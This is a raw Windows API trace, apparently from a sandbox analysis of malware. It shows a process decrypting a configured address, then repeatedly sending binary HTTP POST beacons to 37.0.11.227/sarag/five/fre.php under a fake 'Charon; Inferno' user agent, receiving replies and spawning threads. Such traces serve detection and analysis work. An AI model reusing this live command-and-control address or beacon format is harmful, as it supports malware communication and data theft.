GetProcessHeap () returned 0x690000 [0305.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.184] GetProcessHeap () returned 0x690000 [0305.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0305.184] GetProcessHeap () returned 0x690000 [0305.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0305.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.185] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.190] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0305.197] GetProcessHeap () returned 0x690000 [0305.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0305.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.198] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0305.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.199] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.200] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.200] GetProcessHeap () returned 0x690000 [0305.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0305.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.202] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0305.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.203] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0305.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.204] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0305.204] GetProcessHeap () returned 0x690000 [0305.204] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.205] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0305.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.207] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0305.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.208] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0305.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.209] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0305.209] GetProcessHeap () returned 0x690000 [0305.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0305.209] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0305.209] GetProcessHeap () returned 0x690000 [0305.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0305.209] socket (af=2, type=1, protocol=6) returned 0xa18 [0305.209] connect (s=0xa18, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0305.236] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0305.236] GetProcessHeap () returned 0x690000 [0305.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0305.236] GetProcessHeap () returned 0x690000 [0305.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0305.237] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.238] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0305.238] GetProcessHeap () returned 0x690000 [0305.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0305.238] GetProcessHeap () returned 0x690000 [0305.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.239] GetProcessHeap () returned 0x690000 [0305.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0305.239] GetProcessHeap () returned 0x690000 [0305.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0305.239] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.240] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0305.240] GetProcessHeap () returned 0x690000 [0305.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0305.240] GetProcessHeap () returned 0x690000 [0305.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.241] send (s=0xa18, buf=0x6ad508*, len=242, flags=0) returned 242 [0305.241] send (s=0xa18, buf=0x6aba40*, len=159, flags=0) returned 159 [0305.241] GetProcessHeap () returned 0x690000 [0305.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0305.241] recv (in: s=0xa18, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0305.315] GetProcessHeap () returned 0x690000 [0305.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0305.316] GetProcessHeap () returned 0x690000 [0305.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0305.317] GetProcessHeap () returned 0x690000 [0305.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0305.317] GetProcessHeap () returned 0x690000 [0305.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0305.318] closesocket (s=0xa18) returned 0 [0305.318] GetProcessHeap () returned 0x690000 [0305.318] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0305.318] GetProcessHeap () returned 0x690000 [0305.318] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.318] GetProcessHeap () returned 0x690000 [0305.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0305.319] GetProcessHeap () returned 0x690000 [0305.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0305.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x238) returned 0xa18 [0305.321] Sleep (dwMilliseconds=0xea60) [0305.322] GetProcessHeap () returned 0x690000 [0305.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0305.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.330] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0305.342] GetProcessHeap () returned 0x690000 [0305.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0305.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.343] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0305.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.346] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.347] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.347] GetProcessHeap () returned 0x690000 [0305.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0305.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.348] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0305.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.349] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0305.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.350] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0305.350] GetProcessHeap () returned 0x690000 [0305.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0305.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.351] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.352] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.354] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.355] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.356] GetProcessHeap () returned 0x690000 [0305.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0305.357] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.357] GetProcessHeap () returned 0x690000 [0305.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0305.357] GetProcessHeap () returned 0x690000 [0305.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0305.358] GetProcessHeap () returned 0x690000 [0305.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0305.358] GetProcessHeap () returned 0x690000 [0305.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0305.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.363] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.370] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0305.379] GetProcessHeap () returned 0x690000 [0305.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0305.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.380] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0305.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.381] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.382] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.382] GetProcessHeap () returned 0x690000 [0305.382] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0305.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.383] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0305.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.384] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0305.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.385] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0305.385] GetProcessHeap () returned 0x690000 [0305.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.386] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0305.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.387] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0305.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.388] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0305.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.390] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0305.390] GetProcessHeap () returned 0x690000 [0305.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0305.390] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0305.390] GetProcessHeap () returned 0x690000 [0305.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0305.391] socket (af=2, type=1, protocol=6) returned 0xa1c [0305.391] connect (s=0xa1c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0305.418] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0305.418] GetProcessHeap () returned 0x690000 [0305.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0305.418] GetProcessHeap () returned 0x690000 [0305.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0305.419] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.420] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0305.420] GetProcessHeap () returned 0x690000 [0305.420] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0305.420] GetProcessHeap () returned 0x690000 [0305.421] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.422] GetProcessHeap () returned 0x690000 [0305.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0305.422] GetProcessHeap () returned 0x690000 [0305.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0305.423] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.423] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0305.423] GetProcessHeap () returned 0x690000 [0305.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0305.424] GetProcessHeap () returned 0x690000 [0305.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.425] send (s=0xa1c, buf=0x6ad508*, len=242, flags=0) returned 242 [0305.425] send (s=0xa1c, buf=0x6aba40*, len=159, flags=0) returned 159 [0305.425] GetProcessHeap () returned 0x690000 [0305.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0305.425] recv (in: s=0xa1c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0305.519] GetProcessHeap () returned 0x690000 [0305.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0305.519] GetProcessHeap () returned 0x690000 [0305.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0305.519] GetProcessHeap () returned 0x690000 [0305.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0305.520] GetProcessHeap () returned 0x690000 [0305.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0305.520] closesocket (s=0xa1c) returned 0 [0305.521] GetProcessHeap () returned 0x690000 [0305.521] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0305.521] GetProcessHeap () returned 0x690000 [0305.521] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.521] GetProcessHeap () returned 0x690000 [0305.521] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0305.521] GetProcessHeap () returned 0x690000 [0305.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0305.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x3c4) returned 0xa1c [0305.526] Sleep (dwMilliseconds=0xea60) [0305.528] GetProcessHeap () returned 0x690000 [0305.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0305.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.529] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.538] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0305.545] GetProcessHeap () returned 0x690000 [0305.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0305.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.547] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0305.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.548] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.596] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.596] GetProcessHeap () returned 0x690000 [0305.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0305.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.598] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0305.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.599] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0305.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.602] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0305.602] GetProcessHeap () returned 0x690000 [0305.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.603] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.604] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.605] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.606] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.606] GetProcessHeap () returned 0x690000 [0305.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0305.606] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.606] GetProcessHeap () returned 0x690000 [0305.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0305.607] GetProcessHeap () returned 0x690000 [0305.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.608] GetProcessHeap () returned 0x690000 [0305.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0305.608] GetProcessHeap () returned 0x690000 [0305.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0305.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.609] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0305.622] GetProcessHeap () returned 0x690000 [0305.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0305.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.623] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 